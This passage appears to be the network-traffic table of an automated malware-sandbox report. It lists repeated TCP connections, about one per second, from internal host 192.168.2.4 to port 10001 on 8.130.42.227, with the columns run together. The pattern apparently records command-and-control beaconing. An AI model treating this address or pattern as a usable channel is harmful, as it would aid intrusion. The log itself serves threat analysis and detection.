                                                                Oct 1, 2024 09:19:31.515227079 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.515368938 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.520289898 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:32.462285042 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:32.462373972 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:32.464935064 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:32.464935064 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:32.469882965 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:32.572617054 CEST4986810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:32.577754021 CEST10001498688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:32.580897093 CEST4986810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:32.580897093 CEST4986810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:32.585807085 CEST10001498688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:33.550673008 CEST10001498688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:33.550740004 CEST4986810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:33.550798893 CEST10001498688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:33.550853014 CEST4986810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:33.668993950 CEST4986810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:33.669416904 CEST4986910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:33.673969984 CEST10001498688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:33.674216032 CEST10001498698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:33.674272060 CEST4986910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:33.674436092 CEST4986910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:33.679172993 CEST10001498698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:34.629899979 CEST10001498698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:34.630032063 CEST10001498698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:34.630153894 CEST4986910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:34.631596088 CEST4986910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:34.636538029 CEST10001498698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:34.743545055 CEST4987010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:34.748713970 CEST10001498708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:34.748785019 CEST4987010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:34.748933077 CEST4987010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:34.753709078 CEST10001498708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:35.695903063 CEST10001498708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:35.695993900 CEST4987010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:35.695997000 CEST10001498708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:35.696037054 CEST4987010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:35.748614073 CEST4987010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:35.753432035 CEST10001498708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:35.920615911 CEST4987110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:35.925523043 CEST10001498718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:35.925761938 CEST4987110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:35.925762892 CEST4987110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:35.930649042 CEST10001498718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:36.920609951 CEST10001498718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:36.920643091 CEST10001498718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:36.920659065 CEST4987110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:36.920707941 CEST4987110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:36.922534943 CEST4987110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:36.927309990 CEST10001498718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:37.040245056 CEST4987210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:37.045078993 CEST10001498728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:37.045136929 CEST4987210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:37.045258999 CEST4987210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:37.049982071 CEST10001498728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:38.425457954 CEST10001498728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:38.425474882 CEST10001498728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:38.425491095 CEST10001498728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:38.425618887 CEST10001498728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:38.425761938 CEST4987210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:38.425761938 CEST4987210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:38.428611040 CEST4987210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:38.433362007 CEST10001498728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:38.544564962 CEST4987310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:38.549484968 CEST10001498738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:38.552687883 CEST4987310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:38.556296110 CEST4987310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:38.561129093 CEST10001498738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:39.518117905 CEST10001498738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:39.518145084 CEST10001498738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:39.518197060 CEST4987310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:39.518197060 CEST4987310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:39.518351078 CEST4987310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:39.523133039 CEST10001498738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:39.633868933 CEST4987410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:39.638777971 CEST10001498748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:39.638851881 CEST4987410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:39.638994932 CEST4987410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:39.643784046 CEST10001498748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:40.587492943 CEST10001498748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:40.587564945 CEST10001498748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:40.591059923 CEST4987410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:40.591059923 CEST4987410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:40.596687078 CEST10001498748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:40.702826023 CEST4987510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:40.707760096 CEST10001498758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:40.707954884 CEST4987510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:40.708197117 CEST4987510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:40.712992907 CEST10001498758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:42.136219025 CEST10001498758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:42.136235952 CEST10001498758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:42.136245966 CEST10001498758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:42.136311054 CEST10001498758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:42.136364937 CEST4987510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:42.136476040 CEST4987510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:42.136538029 CEST4987510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:42.141259909 CEST10001498758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:42.242847919 CEST4987610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:42.247889042 CEST10001498768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:42.250827074 CEST4987610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:42.250993967 CEST4987610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:42.255750895 CEST10001498768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:43.230906010 CEST10001498768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:43.230941057 CEST10001498768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:43.230952024 CEST10001498768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:43.230967999 CEST4987610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:43.231008053 CEST4987610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:43.231008053 CEST4987610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:43.231137991 CEST4987610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:43.235891104 CEST10001498768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:43.337469101 CEST4987710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:43.342447996 CEST10001498778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:43.342513084 CEST4987710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:43.342744112 CEST4987710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:43.347515106 CEST10001498778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:44.303792000 CEST10001498778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:44.303807974 CEST10001498778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:44.304788113 CEST4987710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:44.304788113 CEST4987710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:44.309597969 CEST10001498778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:44.416642904 CEST4987810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:44.422669888 CEST10001498788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:44.424791098 CEST4987810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:44.424791098 CEST4987810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:44.429615974 CEST10001498788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:45.387233973 CEST10001498788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:45.387271881 CEST10001498788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:45.387293100 CEST4987810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:45.387331009 CEST4987810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:45.390629053 CEST4987810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:45.395406008 CEST10001498788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:45.509160995 CEST4987910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:45.516057968 CEST10001498798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:45.516119003 CEST4987910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:45.516238928 CEST4987910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:45.523778915 CEST10001498798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:46.466949940 CEST10001498798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:46.466979980 CEST10001498798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:46.467149019 CEST4987910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:46.467149973 CEST4987910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:46.471988916 CEST10001498798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:46.572634935 CEST4988010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:46.577627897 CEST10001498808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:46.580837965 CEST4988010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:46.580837965 CEST4988010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:46.585665941 CEST10001498808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:47.532047033 CEST10001498808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:47.532118082 CEST4988010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:47.532176971 CEST10001498808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:47.532218933 CEST4988010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:47.532253027 CEST4988010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:47.537054062 CEST10001498808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:47.649596930 CEST4988110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:47.654642105 CEST10001498818.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:47.654726028 CEST4988110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:47.654915094 CEST4988110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:47.659950018 CEST10001498818.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:48.613179922 CEST10001498818.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:48.613200903 CEST10001498818.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:48.616950989 CEST4988110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:48.616950989 CEST4988110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:48.621917963 CEST10001498818.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:48.727646112 CEST4988210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:48.732534885 CEST10001498828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:48.732604980 CEST4988210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:48.732733011 CEST4988210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:48.737514973 CEST10001498828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:49.687880039 CEST10001498828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:49.687932014 CEST4988210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:49.688040972 CEST10001498828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:49.688085079 CEST4988210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:49.804745913 CEST4988210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:49.808629990 CEST4988310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:49.809518099 CEST10001498828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:49.813453913 CEST10001498838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:49.816719055 CEST4988310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:49.816788912 CEST4988310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:49.821531057 CEST10001498838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:50.784029961 CEST10001498838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:50.784049988 CEST10001498838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:50.784094095 CEST4988310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:50.784153938 CEST4988310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:50.784323931 CEST4988310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:50.790556908 CEST10001498838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:50.951819897 CEST4988410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:50.956876040 CEST10001498848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:50.956950903 CEST4988410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:50.960016012 CEST4988410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:50.964855909 CEST10001498848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:51.912849903 CEST10001498848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:51.912928104 CEST4988410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:51.912949085 CEST10001498848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:51.912998915 CEST4988410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:51.913280010 CEST4988410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:51.918020010 CEST10001498848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:52.024631977 CEST4988510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:52.029593945 CEST10001498858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:52.029671907 CEST4988510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:52.029941082 CEST4988510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:52.034663916 CEST10001498858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:52.973845005 CEST10001498858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:52.973922014 CEST4988510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:52.974042892 CEST10001498858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:52.974090099 CEST4988510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:53.094769001 CEST4988510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:53.095166922 CEST4988610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:53.308054924 CEST10001498858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:53.308072090 CEST10001498868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:53.308163881 CEST4988610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:53.367117882 CEST4988610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:53.372710943 CEST10001498868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:54.270142078 CEST10001498868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:54.270160913 CEST10001498868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:54.271034956 CEST4988610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:54.271034956 CEST4988610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:54.275876045 CEST10001498868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:54.386884928 CEST4988710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:54.392374992 CEST10001498878.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:54.395162106 CEST4988710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:54.395162106 CEST4988710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:54.400001049 CEST10001498878.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:58.400645971 CEST4988710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:58.512640953 CEST4988810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:58.517586946 CEST10001498888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:58.518883944 CEST4988810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:58.518883944 CEST4988810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:58.523736000 CEST10001498888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:59.471184969 CEST10001498888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:59.471237898 CEST10001498888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:59.471246004 CEST4988810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:59.471292973 CEST4988810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:59.471359968 CEST4988810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:59.476063013 CEST10001498888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:59.587172031 CEST4988910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:59.592259884 CEST10001498898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:59.592319965 CEST4988910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:59.592446089 CEST4988910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:59.597208023 CEST10001498898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:00.548245907 CEST10001498898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:00.548260927 CEST10001498898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:00.548335075 CEST4988910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:00.548572063 CEST4988910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:00.553344011 CEST10001498898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:00.664635897 CEST4989010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:00.669951916 CEST10001498908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:00.670105934 CEST4989010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:00.670236111 CEST4989010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:00.675008059 CEST10001498908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:01.623522997 CEST10001498908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:01.623572111 CEST10001498908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:01.623606920 CEST4989010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:01.623651028 CEST4989010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:01.667278051 CEST4989010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:01.672111034 CEST10001498908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:01.791146994 CEST4989110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:01.796021938 CEST10001498918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:01.796483994 CEST4989110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:01.800647974 CEST4989110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:01.806077957 CEST10001498918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:02.745127916 CEST10001498918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:02.745237112 CEST10001498918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:02.745260000 CEST4989110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:02.745493889 CEST4989110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:02.852602959 CEST4989110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:02.853065968 CEST4989210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:02.857315063 CEST10001498918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:02.857862949 CEST10001498928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:02.857924938 CEST4989210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:02.858095884 CEST4989210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:02.862808943 CEST10001498928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:03.804457903 CEST10001498928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:03.804555893 CEST10001498928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:03.807192087 CEST4989210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:03.807192087 CEST4989210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:03.812026024 CEST10001498928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:03.914925098 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:03.919776917 CEST10001498938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:03.923046112 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:03.923047066 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:03.928324938 CEST10001498938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:04.885559082 CEST10001498938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:04.885585070 CEST10001498938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:04.885627031 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:04.885713100 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:04.885752916 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:04.890605927 CEST10001498938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:04.993974924 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.000019073 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:05.000077009 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.000210047 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.004901886 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:05.942061901 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:05.942198038 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:05.944845915 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.944845915 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.949687004 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:06.058729887 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:06.063678026 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:06.063822985 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:06.064068079 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:06.068840981 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.026357889 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.026432037 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.026451111 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.026535988 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.026716948 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.031438112 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.153959990 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.158855915 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.158926964 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.162061930 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.166883945 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.116475105 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.116543055 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.116553068 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.116801023 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.117424011 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.122136116 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.228091955 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.234483957 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.234622955 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.235248089 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.241367102 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.189207077 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.189254999 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.189258099 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.189296961 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.189462900 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.194215059 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.306096077 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.310868979 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.310933113 CEST4989810001192.168.2.48.130.42.227
